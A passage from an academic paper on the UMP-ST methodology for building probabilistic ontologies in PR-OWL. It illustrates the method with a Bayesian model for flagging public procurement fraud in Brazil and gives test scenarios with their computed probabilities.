differentiate collusion among vendors and collusion between employee and vendors, Oliveira classifies both as simply collusion. Formalizing knowledge about fraud in a computable form can lead to automated support for fraud detection and prevention. Specifically, analysts at the CGU must sift through vast amounts of information related to a large number of procurements. Automated support can improve analyst productivity by highlighting the most important cases and the most relevant supporting information. The ultimate goal of the procurement fraud probabilistic ontology is to structure the specialist’s knowledge to enable automated reasoning from indicators to potential fraud types. Such an automated system is intended to support specialists and to help train new specialists, but not to replace them. Automated support for this task requires a semantically rich representation that supports uncertainty management. Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 11/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.77 As a case study, Carvalho (2011) developed a proof-of-concept probabilistic ontology covering part of the procurement fraud domain. This paper uses a portion of this case study to illustrate how the POMC can support the creation of a PO. The full implementation and code for the case study is presented in Carvalho (2011) and is provided as Supplemental Information. This proof-of-concept implementation represents only a fragment of the specialist’s knowledge of the procurement fraud domain. The plan is eventually to extend this PO to a full representation of the specialist’s knowledge. UMP-ST FOR PROCUREMENT FRAUD This section describes in detail the four disciplines in the UMP-ST process and their application to the procurement fraud case study. To facilitate the understanding of each discipline, we alternate between describing the discipline and illustrating its application to the public procurement fraud detection and prevention use case. Requirements The POMC begins with the Requirements discipline (R.1 in Fig. 2). The requirements discipline defines the objectives that must be achieved by representing and reasoning with a computable representation of domain semantics. For this discipline, it is important to define the questions that the model is expected to answer, i.e., the queries to be posed to the system being designed. For each question, a set of information items that might help answer the question (evidence) must be defined. Requirements can be categorized as functional and non-functional (Wiegers, 2003; Sommerville, 2010). Functional requirements concern outputs the system should provide, features it should have, how it should behave, etc. In our case, functional requirements relate to the goals, queries, and evidence that pertain to our domain of reasoning. Non-functional requirements, on the other hand, address criteria relating to performance of the system as a whole. For instance, in our use case a non-functional requirement could be that a given query has to be answered in less than a minute. Another example is that the posterior probability given as an answer to a given query has to be either exact or an approximation with an error bound of ±0.5%. Non-functional requirements are typically not specific to probabilistic ontology development. We therefore focus here on how to develop functional requirements for our use case. We focus on a subset of our procurement use case to illustrate how a requirement is carried through the PO development cycle until it is eventually implemented and tested. To understand the requirements associated with this subset, we first have to explain some of the problems encountered when dealing with public procurements. One of the principles established by Law No. 8,666/93 is equality among bidders. This principle prohibits the procurement agent from discriminating among potential suppliers. However, if the procurement agent is related to the bidder, he/she might feed information or define new requirements for the procurement in a way that favors the bidder. Another problem arises because public procurement is quite complex and may involve large sums of money. Therefore, members forming the committee for a procurement must both be well prepared, and have a clean history with no criminal or administrative Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 12/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.77/supplemental-information http://dx.doi.org/10.7717/peerj-cs.77/supplemental-information http://dx.doi.org/10.7717/peerj-cs.77 convictions. This latter requirement is necessary to satisfy the ethical guidelines that federal, state, municipal and district government employees must follow. The above considerations give rise to the following set of goals, queries, and evidence: 1. Goal: identify whether a given procurement violates fair competition policy (i.e., evidence suggests further investigation and/or auditing is warranted); (a) Query: is there any relation between the committee and the enterprises that participated in the procurement? i. Evidence: committee member and responsible person of an enterprise are related (mother, father, brother, or sister); ii. Evidence: committee member and responsible person of an enterprise live at the same address. 2. Goal: identify whether the committee for a given procurement has improper composition. (a) Query: is there any member of committee who does not have a clean history? i. Evidence: committee member has criminal history; ii. Evidence: committee member has been subject to administrative investigation. (b) Query: is there any relation between members of the committee and the enterprises that participated in previous procurements? i. Evidence: member and responsible person of an enterprise are relatives (mother, father, brother, or sister); ii. Evidence: member and responsible person of an enterprise live at the same address. In defining requirements, the availability of evidence must be considered. For example, information about whether persons are related might be drawn from a social network database; evidence about criminal history might come from a police database; an evidence about cohabitation might be drawn from an address database. One important role for semantic technology is to support interoperability among these various data sources and the fraud detection model. Another important aspect of the Requirements discipline is defining traceability of requirements. According to Gotel & Finkelstein (1994), ‘‘requirements traceability refers to the ability to describe and follow the life of a requirement, in both the forward and backward directions.’’ A common tool for traceability is a specification tree, in which each requirement is linked to its ‘‘parent’’ requirement. A specification tree for the requirements for our procurement model is shown in Fig. 3. In this hierarchy, each item of evidence is linked to a query it supports, which in turn is linked to its higher level goal. This linkage supports requirements traceability. In addition to the hierarchical decomposition of the specification tree, requirements should also be linked to work products of other disciplines, such as the rules in the Analysis & Design discipline, or goals, queries, and evidence elicited in the Requirements discipline. These links provide traceability that is essential to validation and management of change. Subsequent sections show how UMP-ST supports requirements tracing. Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 13/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.77 1Every Brazilian citizen is required to file tax information, even if only to state that his or her income is below a certain amount and no taxes are owed. Figure 3 Specification tree for procurement model requirements. Analysis & Design Once we have defined our goals and described how to achieve them, it is time to start modeling the entities, their attributes, relationships, and rules to make that happen. This is the purpose of the Analysis & Design discipline. The major objective of this discipline is to define the semantics of the model. In fact, much of the semantics can be defined using traditional ontologies, including the deterministic rules that the concepts described in our model must obey. The focus of this paper is on representing uncertain aspects of the domain. Information on defining traditional ontologies can be found in Allemang & Hendler (2011) and Gomez-Perez, Corcho & Fernandez-Lopez (2004). The first step in defining the domain model is to define the classes and relationships that are important to represent for the procurement fraud detection problem (AD.1 in Fig. 2). For our case study, we use the Unified Modeling Language (UML) (Rumbaugh, Jacobson & Booch, 1999) for this purpose. Analysis & Design also includes developing rules (AD.2 in Fig. 2). Because UML is insufficiently expressive to represent complex rule definitions, we record the deterministic rules separately for later incorporation into the PR-OWL probabilistic ontology. While experienced ontology engineers might prefer to define classes, relationships and rules directly in OWL, we chose UML for its popularity, understandability, ease of communication with domain experts, and widely available and usable software tools. We see UML-style diagrams as a way to capture knowledge about classes and relationships that could be automatically translated into an OWL ontology or PR-OWL probabilistic ontology (cf., Gasevic et al. (2004)). Figure 4 depicts a simplified model of the classes and relationships in the procurement fraud domain. A Person has a name, a mother and a father (also Person). Every Person has a unique identification that in Brazil is called CPF. A Person also has an Education and livesAt a certain Address. In addition, everyone is obliged to file his/her TaxInfo every year, including his/her annualIncome.1 These entities can be grouped as Personal Information. A PublicServant is a Person who worksFor a PublicAgency, which is a Government Agency. Every public Procurement is owed by a PublicAgency, has a committee formed by a group of PublicServants, and has a Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 14/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.77 Figure 4 Entities, their attributes, and relations for the procurement model. group of participants, which are Enterprises. One of these will be the winner of the Procurement. Eventually, the winner of the Procurement will receive a Contract of some value with the PublicAgency owner of the Procurement. The entities just described can be grouped as Procurement Information. Every Enterprise has at least one Person that is responsible for its legal acts. An Enterprise also has an identification number, the General List of Contributors CGC, which can be used to inform that this Enterprise is suspended from procuring with the public administration, isSuspended. These are grouped as the Enterprise Information. We also have AdminstrativeInvestigation, which has information about investigations that involve one or more PublicServer. Its finalReport, the JudgmentAdministrativeReport, contains information about the penalty applied, if any. These entities form the Administrative Judgment Information. Finally we have the Criminal Judgment Information group that describes the CriminalInvestigation that involves a Person, with its finalReport, the JudgmentCriminalReport, which has information about the verdict. Notice that just a subset of this UML model is of interest to us in this paper, since we are dealing with just a subset of the requirements presented in Carvalho (2011). Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 15/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.77 In addition to the cardinality and uniqueness rules defined above for the entities depicted in Fig. 4, the AD.2 step in Fig. 2 includes specifying probabilistic rules to address the requirements defined in the R.1 step. These include: 1. If a member of the committee has a relative (mother, father, brother, or sister) responsible for a bidder in the procurement, then it is more likely that a relation exists between the committee and the enterprises, which inhibits competition. 2. If a member of the committee lives at the same address as a person responsible for a bidder in the procurement, then it is more likely that a relation exists between the committee and the enterprises, which lowers competition. 3. If 1 or 2, then the procurement is more likely to violate policy for fair competition. 4. If a member of the committee has been convicted of a crime or has been penalized administratively, then he/she does not have a clean history. If he/she was recently investigated, then it is likely that he/she does not have a clean history. 5. If the relation defined in 1 and 2 is found in previous procurements, then it is more likely that there will be a relation between this committee and future bidders. 6. If 4 or 5, then it is more likely that the committee violates policy for proper committee composition. Typically the probabilistic rules are described initially using qualitative likelihood statements. Implementing a probabilistic ontology requires specifying numerical probabilities. Probability values can be elicited from domain experts (e.g., Druzdzel & Van der Gaag, 2000; O’Hagan et al., 2006) or learned from observation. The growing literature in statistical relational learning (e.g., Getoor & Taskar, 2007) provides a wealth of methods for learning semantically rich probability models from observations. In the Analysis & Design stage, information is identified for specifying the probability distributions (expert judgment and/or data sources). This information is encoded into the target representation during the Implementation stage. The traceability matrix of Table 1 depicts how the probabilistic rules defined above are traced to the goals, queries and evidence items defined in the Requirements discipline. This traceability matrix is an important tool to help designers to ensure that all requirements have been covered. It also supports maintainability by helping ontology engineers to identify how requirements are affected by changes in the model. It is also important at this stage to trace each of the rules to the source of information used to define the rule (e.g., notes from interview with expert, training manual, policy document, data source). Another important step in the Analysis & Design discipline is to form natural groups of entities, rules, and dependencies (AD.3 in Fig. 2). This step facilitates the Implementation discipline. The more complex the domain, the more important is the grouping activity. As shown in Fig. 4, even in this simplified example there are five natural groups: (1) Personal Information; (2) Procurement Information; (3) Enterprise Information; (4) Administrative Judgment Information; and (5) Criminal Judgment Information. Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 16/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.77 Table 1 Traceability Matrix Relating Rules to Requirements. Rule.1 Rule.2 Rule.3 Rule.4 Rule.5 Rule.6 Rq.1 X X X Rq.1.a X X Rq.1.a.i X Rq.1.a.ii X Rq.2 X X X Rq.2.a X Rq.2.a.i X Rq.2.a.ii X Rq.2.b X Rq.2.b.i X Rq.2.b.ii X Implementation Once the Analysis & Design step has been completed, the next step is to implement the model in a specific language. How this discipline is carried out depends on the specific language being used. Our case study was developed using the PR-OWL probabilistic ontology language (Costa, 2005; Carvalho, 2008). PR-OWL (pronounced ‘‘prowl’’) adds new definitions to OWL to allow the modeler to incorporate probabilistic knowledge into an OWL ontology. This section shows how to use PR-OWL to express uncertainty about the procurement fraud domain. PR-OWL uses Multi-Entity Bayesian Networks (MEBN) (Laskey, 2008) to express uncertainty about properties and/or relations defined on OWL classes. A probability model is defined as a set of MEBN Fragments (MFrags), where each MFrag expresses uncertainty about a small number of attributes of and/or relationships among entities. A set of properly defined MFrags taken together comprise a MEBN theory (MTheory), which can express a joint probability distribution over complex situations involving many entities in the domain. Unlike most expressive probabilistic languages that assume the domain is finite (e.g., Heckerman, Meek & Koller, 2004), an MTheory can express knowledge about an unbounded or even infinite set of entities. A properly defined PR-OWL model expresses an MTheory, and thus expresses a global joint distribution over the random variables mentioned in the theory. For more detailed explanations on the key features of MEBN logic, the reader should refer to Laskey (2008). On a typical usage of a PR-OWL probabilistic ontology, during execution time (e.g., in response to a query) a logical reasoning process would instantiate the MFrags that are needed to respond to the query. The result of this process is a situation-specific Bayesian network (SSBN), which is a minimal Bayesian network sufficient to obtain the posterior distribution for a set of target random variable instances given a set of finding random variable instances. In a PR-OWL probabilistic ontology, the entity types correspond to OWL classes, the attributes correspond to OWL properties, and the relationships correspond to OWL relations. Thus, PR-OWL allows the ontology designer to specify probability distributions to express uncertainty about properties and relations in an OWL ontology. Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 17/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.77 Figure 5 PR-OWL entities for the procurement domain. The expressive power of MEBN/PR-OWL makes it an attractive choice for implementing probabilistic ontologies in complex domains. Its compatibility with OWL, a widely used ontology language, allows for the expression of uncertainty in existing OWL ontologies, and for integrating PR-OWL probabilistic ontologies with other ontologies expressed in OWL. These are the primary reasons for the choice of MEBN/PR-OWL as the implementation language in our case study. The first step in defining a PR-OWL probabilistic ontology for the procurement fraud domain is to represent the entities, attributes and relations of Fig. 4 as OWL classes, properties and relations (I.1 in Fig. 2). Our proof-of-concept made a few simplifications to the representation depicted in Fig. 4. For example, we removed the PublicServant entity and connected Person directly to PublicAgency with the workFor relationship. As another simplification, we assumed that every Person and Enterprise instance is uniquely identified by its name, so there was no need to represent the CPF and CGC entities. Fig. 5 presents the entities as entered into our PR-OWL ontology implemented in UnBBayes (Carvalho et al., 2009). After defining the entities, we consider characteristics that may be uncertain. An uncertain attribute of an entity or an uncertain relationship among entities is represented in MEBN by a random variable (RV). For example, the RV livesAt(person) corresponds Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 18/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.77 Figure 6 Creating a RV in PR-OWL plug-in from its OWL property by drag-and-drop. to the relation livesAt from Fig. 4. As it is a functional relation, livesAt relates a Person to an Address. Hence, the possible values (or states) of this RV are instances of Address. To define a probability distribution for an uncertain attribute or relationship, we must declare it as resident in some MFrag. This occurs as part of I.1 in Fig. 2; its probability distribution will be defined later as part of I.2. For example, Fig. 6 shows how to define uncertainty about whether two persons are related. This is accomplished by selecting the OWL property isRelated and dragging the property and dropping it inside the PersonalInfo MFrag. The MFrags are language specific groupings formed out of the grouping performed during the Analysis & Design discipline (AD.3 from Fig. 2). The yellow oval on the right-hand side of Fig. 6 shows the RV defined by the PR-OWL plug-in for UnBBayes (Matsumoto, 2011) to represent uncertainty about whether persons are related. In the background what actually happens is that an instance of the DomainResidentNode class, which is a random variable that has its probability distribution defined in the current MFrag, is created. In addition, an assertion is also added saying that this instance definesUncertaintyOf the OWL property isRelated. Once RVs have been created for all uncertain attributes and relationships, probabilistic dependencies can be identified by analyzing how the RVs influence each other. The rules defined as part of the Analysis & Design discipline describe probabilistic relationships that are formally defined as part of the Implementation discipline. For example, rule 2 indicates that there is a dependence between hasCriminalHistory(person), hasAdministrativeHistory(person), and hasCleanHistory(person). Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 19/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.77 2A more sophisticated model for deciding whether to do further investigation or change the committee would define a utility function and use expected utility to make the decision. Future versions of UnBBayes will support Multi-Entity Influence Diagrams (Costa, 2005) for modeling decision-making under uncertainty. 3Maybe a better name for this node would be isTrustworthy. Nevertheless, the idea is that if someone was investigated and/or convicted then he might not be a good candidate for being part of a procurement committee. Figure 7 Part of the probabilistic ontology for fraud detection and prevention in public procurements. For this paper, we focus on the Judgment History, Improper Committee, and Improper Procurement MFrags. Figure 7 shows a partial MTheory consisting of these three MFrags. Details on the complete PR-OWL MTheory can be found in Carvalho (2011) and are provided as Supplemental Information. Each MFrag defines local probability distributions (LPDs) for its resident RVs, shown as yellow ovals. These distributions are conditioned on satisfaction of constraints expressed by context RVs, shown as green pentagons. The local distributions may depend on the values of input RVs, shown as gray trapezoids, whose distributions are defined in the MFrags in which they are resident. The two main goals described in our requirements are defined in the Improper Procurement and Improper Committee MFrags.2 The Judgment History MFrag has RVs representing the judgment (criminal and administrative) history of a Person. There are three LPDs defined in the Judgment History MFrag: (1) a probability that a person has a criminal history; (2) a probability that a person has an administrative history, and (3) a probability that a person has a clean history given whether or not that person has a criminal and/or an administrative history. This latter probability is lowest if he/she has never been investigated, higher if he/she has been investigated, and extremely high if he/she has been convicted.3 Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 20/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.77/supplemental-information http://dx.doi.org/10.7717/peerj-cs.77 The Improper Committee MFrag contains the resident RV hasImproperCommittee (procurement), defined under the context constraints that procurement is an entity of type Procurement, member is an entity of type Person, and member is a member of the committee for procurement. The assumptions behind the LPD defined in this MFrag are that: if any committee member of this procurement does not have a clean history, or if any committee member was related to previous participants, then the committee is more likely to be improper; and that if these things happen together, the probability of a improper committee is even higher. The Improper Procurement MFrag has the resident RV isImproperProcurement (procurement), created in the same way as the isRelated RV inside the PersonalInfo MFrag explained previously. The assumptions behind the LPD defined in this MFrag are that: if the competition is compromised, or if any owner of a participating enterprise owns a suspended enterprise, or if committee of this procurement is improper, then the procurement is more likely to be improper; and that if these things happen together, the probability of having an improper procurement is even higher. The final step in constructing a probabilistic ontology in UnBBayes is to define the LPDs for all resident RVs (I.2 in Fig. 2). Figure 8 shows the LPD for the resident node isImproperProcurement(procurement), which is the main question we need to answer in order to achieve one of the main goals in our model. This distribution follows the UnBBayes-MEBN grammar for defining LPDs (Carvalho, 2008; Carvalho et al., 2008). The distribution for isImproperProcurement depends on the values of the parent RVs isCompetitionCompromised, hasImproperCommittee and ownsSuspendedEnterprise. The LPD is defined through a series of if-then-else statements giving the probability of ownsSuspendedEnterprise given each combination of truth-values of its parents. In this example, if all three parent RVs are true, then ownsSuspendedEnterprise has probability 0.9; if any two parents are true, then ownsSuspendedEnterprise has probability 0.8; if just one parent is true, then ownsSuspendedEnterprise has probability 0.7; if none of the parents is true then ownsSuspendedEnterprise has probability 0.0001. The probability values shown here were defined in collaboration with the specialist who supported the case study. In general, probability values for the MFrags are defined through some combination of expert elicitation and learning from data. However, in the PO described in this paper, all LPDs were defined based on the experience of the SMEs from CGU, since there is not enough structured data to learn the distributions automatically. It is important to ensure traceability between the MFrags defined in the Implementation stage and the rules defined in the Analysis & Design stage. A traceability matrix similar to Table 1 was developed to trace MFrags to rules. This mapping, along with the mapping of the rules to the requirements as documented in Table 1, enables the probabilistic relationships expressed in the MFrags to be traced back to the requirements defined in the Goals stage. Test As with any engineering methodology, test (T.1 in Fig. 2) plays an essential role in UMP-ST. As Laskey & Mahoney (2000) point out, test should do more than showcase the model and Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 21/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.77 Figure 8 LPD for node isImproperProcurement(procurement). demonstrate that it works as envisioned. Another important goal of the Test discipline is to find flaws and areas for improvement in the model. The literature distinguishes two types of evaluation, verification and validation (Adelman, 1992). Verification is concerned with establishing that ‘‘the system was built right,’’ i.e., that the system elements conform to their defined performance specifications. Validation is concerned with establishing that the ‘‘right system was built,’’ i.e., that it achieves its intended use in its operational environment. For example, in the model we have been describing in this Section we would like to verify that the system satisfies the non-functional requirements developed during the Requirements stage as described above, e.g., that the queries covered by the requirement are answered in less than a minute and that the posterior probability given as an answer to a given query is either exact or has an approximation with an error bound of .5% or less. Laskey & Mahoney (2000) present three types of evaluation: elicitation review, importance analysis, and case-based evaluation. Elicitation review includes reviewing the model documentation, analyzing whether all the requirements were addressed in the final model, making sure all the rules defined during the Analysis & Design stage were implemented, validating the semantics of the concepts Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 22/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.77 described by the model, etc. This is an important step towards achieving consistency in our model, especially if it was designed by more than one expert. Elicitation review can also confirm that the rules as defined correctly reflect stakeholder requirements. The traceability matrices are a useful tool for verifying whether all the requirements were addressed in the final implementation of the model. By looking at the matrix tracing MFrags to rules, we can verify that all the rules defined during Analysis & Design have been covered. The traceability matrix of Table 1, defined during Analysis & Design, ensured that the rules covered all the defined requirements. Therefore, by composing these matrices, we can infer that all the requirements have been implemented in our model. This review should also confirm that important stakeholder requirements were not missed during Analysis & Design. Of course, an initial implementation will often intentionally cover only a subset of the stakeholder requirements, with additional requirements being postponed for later versions. Lessons learned during implementation are reviewed at this stage and priorities for future iterations are revisited and revised. Importance analysis is a model validation technique described by Laskey & Mahoney (2000). A form of sensitivity analysis, its purpose is to verify that selected parts of the model behave as intended. In importance analysis, one or more focus RVs are specified and their behavior is examined under different combinations of values for evidence RVs. The output is a plot for each focus RV that orders the evidence RVs by how much changes in the value of the evidence RV affect the probability of the focus RV. Importance analysis is an important type of unit testing. In the case of PR-OWL, we can analyze the behavior of the random variables of interest given evidence per MFrag. This MFrag testing is important to capture local consistency of the model and to help localize the source of any problems identified in the model. The tests designed in this section as well as the model described in this paper were developed with the help of experts from the Department of Research and Strategic Information from CGU. They provided detailed information on the different types of frauds as well as on evidence that they usually search for when auditing contracts during the internal control activities. Furthermore, they have also validated the proof-of-concept model described in this paper with the tests we will describe as well as others that were omitted due to space restrictions. As an example of unit testing, we demonstrate how to define different scenarios to test the Judgment History MFrag. Essentially, we want to verify how the query hasCleanHistory(person) will behave in light of different set of evidence for a person’s criminal and administrative history. Results for just one combination of states for the parent RVs are shown in Fig. 9, which shows three distinct scenarios for a 3-node model. The model assesses whether or not a given person (person 1 in the figure) has a clean history. It consists of a binary RV with two parents. Each parent represents whether or not the person has been convicted, investigated, or not investigated in a criminal process (hasCriminalHistory__person1) or in an administrative process (hasAdministrativeHistory__person1). Figure 9A shows the model with no evidence entered (all nodes in yellow with non-zero probabilities), which Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 23/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.77 Figure 9 Results of unit testing for the Judgment History MFrag. results in a marginal ‘‘a priori’’ probability of 1.1% that any given person would not have a clean history. Figure 9B shows the model results when knowledge about NeverInvestigated is entered in the hasCriminalHistory_person1 RV (hasCriminalHistory__person1 node is colored in gray to show that it is observed). This causes a slight reduction in the belief that person 1 does not have a clean history (down from 1.1% to 1.05%). Finally, Fig. 9C shows the model’s results when evidence on person 1 having a criminal conviction and never being investigated on an administrative process are entered (both parents now shown in gray with 100% probability on the observed value). A systematic unit test would examine other combinations as well (Carvalho, 2011). It is important that unit testing achieve as much coverage as possible, and that results be analyzed by verifying that posterior probabilities behave as expected. In our case, the posterior probabilities are consistent with the expected result as defined by the expert. Case-based evaluation is conducted by defining a range of different scenarios and examining the results produced by the system for each of the scenarios. Case-based evaluation is a system level test appropriate for integration testing. For our procurement PO, we define scenarios with evidence represented in different MFrags. This means that each query response will require instantiating multiple parts of the model, helping to validate how the model works as a whole. This validation is important to whether the model’s global performance matches the specialist’s knowledge. It is important to try out different scenarios in order to capture the nuances of the model. In fact, it is a good practice to design the scenarios in order to cover the range of requirements the model must satisfy (Wiegers, 2003; Sommerville, 2010). Although it is impossible to cover every scenario we might encounter, we should aim for good coverage, and especially look for important ‘‘edge cases.’’ A traceability matrix relating unit tests and case-based evaluation scenarios to MFrags is a useful tool to ensure that test scenarios have achieved sufficient coverage. Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 24/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.77 4The SSBN generated for this scenario is shown in Carvalho (2011), provided as Supplemental Information. Keeping in mind the need to evaluate a range of requirements, we illustrate case-based evaluation with three qualitatively different scenarios. The first one concerns a regular procurement with no evidence to support the hypothesis of an improper procurement or committee. The second one has conflicting evidence in the sense that some supports the hypothesis of having an improper procurement or committee but some does not. Finally, in the third scenario there is overwhelming evidence supporting the hypothesis of an improper procurement or committee. When defining a scenario, it is important to define the hypothesis being tested and what is the expected result, besides providing the evidence which will be used. Table 2 presents a comparison between all three scenarios. It can be seen that the difference between the first and the second scenarios is that member 1 was never investigated administratively in the first scenario, but was in the second. In the third scenario, however, besides having the evidence that member 1 was investigated, we also have the evidence that person 1 and 3 live at the same address and that person 2 lives at the same address as member 3. In the first scenario, we expect that procurement will not be deemed improper since the members of the committee have never been investigated in either administrative or criminal instances and we have no relevant information about the owners of the enterprises participating in the procurement. When the query is presented to the system, the needed MFrags are retrieved and instantiated for the entities relevant to the scenario, resulting in an SSBN that answers the query. Figure 10 shows part of the SSBN generated from scenario 1. Evidence includes the fact that member 2, who in this SSBN is part of the procurement process being assessed, has never been investigated in either an administrative process or in a criminal process. As expected, the probability of both isImproperProcurement(procurement1) = true and isImproperCommittee(procurement1) = true are low, 2.35% and 2.33%, respectively. In other words, the procurement is unlikely to be improper given the evidence entered so far. In the second scenario, one of the three members of the committee was previously investigated in the administrative instance. All other evidence is the same as in the previous scenario. We expect that this new piece of evidence should not be strong enough to make the procurement improper, although the probability of being improper should be higher than in the first scenario. The results of inference are as expected. The probability of isImproperProcurement (procurement1) = true and isImproperCommittee(procurement1) = true are 20.82% and 28.95%, respectively.4 In other words, the probability increased but it is still relatively unlikely. However, depending on the stringency of the threshold, this case might be flagged as warranting additional attention. Finally, in the third scenario, we have evidence that the owners of two different enterprises participating in the procurement process live at the same address. Since there are only three enterprises participating in the procurement, the competition requirement is compromised. Thus, the procurement is likely to be improper. Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 25/36 http://dx.doi.org/10.7717/peerj-cs.77/supplemental-information https://peerj.com http://dx.doi.org/10.7717/peerj-cs.77 Table 2 Comparison of all three scenarios. Scenario Hypothesis and expected result Evidence Result Evidence that apply to all scenarios: hasCriminalHistory(member2)=NeverInvestigated hasProcurementOwner(procurement1)= agency1 isMemberOfCommittee(member1, procurement1)= true isMemberOfCommittee(member2, procurement1)= true isMemberOfCommittee(member3, procurement1)= true isParticipantIn(enterprise1, procurement1)= true isParticipantIn(enterprise2, procurement1)= true isParticipantIn(enterprise3, procurement1)= true isProcurementFinished(procurement1)= false isResponsibleFor(person1, enterprise1)= true isResponsibleFor(person2, enterprise2)= true isResponsibleFor(person3, enterprise3)= true Evidence unique to this scenario: 1 Low probability that isImproperProcurement (procurement1)= true Low probability that isImproperCommittee (procurement1)= true hasAdministrativeHistory(member1)=NeverInvestigated 2.35% that isImproperProcurement (procurement1)= true 2.33% that isImproperCommittee (procurement1)= true Probability that isImproperProcurement (procurement1) = true%, between 10% and 50% 20.82% that isImproperProcurement (procurement1)= true 2 Probability that isImproperCommittee (procurement1)= true%, between 10% and 50% Evidence unique to this scenario: hasAdministrativeHistory(member1)= Investigated 28.95% that isImproperCommittee (procurement1)= true Probability that isImproperProcurement (procurement1)=%, true greater than 50% 60.08% that isImproperProcurement (procurement1)= true 3 Probability that isImproperCommittee (procurement1)=%, true between 10% and 50% Evidence unique to this scenario: hasAdministrativeHistory(member1)= Investigated livesAtSameAddress(person1, person3) livesAtSameAddress(person2, member3) 28.95% that isImproperCommittee (procurement1)= true C arvalho etal. (2016),P eerJ C om put.S ci.,D O I10.7717/peerj-cs.77 26/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.77 5The SSBN generated for this scenario is shown in Carvalho (2011), provided as Supplemental Information. Figure 10 Part of the SSBN generated for the first scenario. As expected, the probability of isImproperProcurement(procurement1) = true and isImproperCommittee(procurement1) = true are much larger, at 60.08% and 28.95%, respectively.5 Notice that although the probability of having an improper procurement correctly increased to a value greater than 50%, the probability of having an improper committee has not changed, since there is no new evidence supporting this hypothesis. The cases presented here are meant to illustrate the UMP-ST. A full case-based evaluation would consider a broad range of cases with good coverage of the intended use of the model. APPLICABILITY OF UMP-ST TO OTHER DOMAINS In this paper, we focused on the fraud identification use case as a means to illustrate the core ideas of the UMP-ST. We chose this use case because its applicability was clear and its benefits have been independently tested (the methodology is currently being evaluated for use by the Brazilian Office of the Comptroller General). Nevertheless, the methodology is applicable to any problem requiring the development of a probabilistic ontology. Other examples of using the technique can be found in the terrorist identification domain (Haberlin, Costa & Laskey, 2014) and the maritime situation awareness (MDA) domain (Haberlin, 2013; Carvalho et al., 2011). For instance, the latter involved the development of a probabilistic ontology as part of the PROGNOS (Probabilistic OntoloGies for Net-centric Operation Systems) project (Costa, Laskey & Chang, 2009; Carvalho et al., 2010), in which PR-OWL was chosen as the ontology language due to its comprehensive treatment of uncertainty, use of a highly expressive first-order Bayesian language, and compatibility with OWL. Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 27/36 http://dx.doi.org/10.7717/peerj-cs.77/supplemental-information https://peerj.com http://dx.doi.org/10.7717/peerj-cs.77 The MDA probabilistic ontology is designed for the problem of identifying whether a given vessel is a ship of interest. The probabilistic ontology was written in PR-OWL, and its development employed the UMP-ST process. An important aspect is that the development of the PR-OWL ontology was initially based on an existing ontology of Western European warships that identifies the major characteristics of each combatant class through the attributes of size, sensors, weapons, missions, and nationality. Thus, its development was a good case study for applying UMP-ST to extend an existing ontology to incorporate uncertainty. During its development, the MDA ontology was evaluated for face validity with the help of semantic technology experts with knowledge of the maritime domain. This evaluation effort had issues in getting feedback from a sufficiently large number of experts, but the overall result of the evaluation suggests the UMP-ST not only as viable and applicable to the problem it supports but also a promising approach for using semantic technology in complex domains (Haberlin, 2013). More recently, Alencar (2015) applied the UMP-ST process to create a PO for supporting the decision of whether or not to proceed with Live Data Forensic Acquisition. Besides using the UMP-ST, several tools and techniques shown in this paper were also applied: the use of UML Class Diagrams to identify the main entities, attributes, and relations for the model; the use of a traceability matrix to facilitate further improvements in the model; the implementation of the PO using PR-OWL and UnBBayes; and the validation of the model using both unit testing and case-based evaluation. FUTURE WORK A natural next step in this research is the development of automated tools to support the UMP-ST. It is useful to have a tool to guide the user through the steps necessary to create a probabilistic ontology and link this documentation to its implementation in the UnBBayes PR-OWL plug-in. A tool to support this documentation process has been developed by the Group of Artificial Intelligence (GIA, Grupo de Inteligência Artificial, in Portuguese) from the Universidade de Brasília, Brazil (De Souza, 2011; Santos et al., 2014; Carvalho et al., 2014). Penetration of semantic technology into serious applications cannot rely only on hand- engineered ontologies. There has been a robust literature on ontology learning (Hazman, R. El-Beltagy & Rafea, 2011) and learning of expressive probabilistic representations (Getoor & Taskar, 2007; De Raedt, 1996; Luna, Revoredo & Cozman, 2010), and there is robust research activity on the topic. The probability specification step of the POMC could combine both expert-specified probability distributions and probability distributions learned from data. Practicing ontology engineers and the semantic technology community would benefit from widely available ontological engineering tools that support UMP-ST, provide scalable inference and support learning. In addition, there are other disciplines not discussed in this paper that are essential for practical ontology engineering, such as configuration management and user experience design. Further, the UMP-ST process would benefit Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 28/36 https://peerj.com 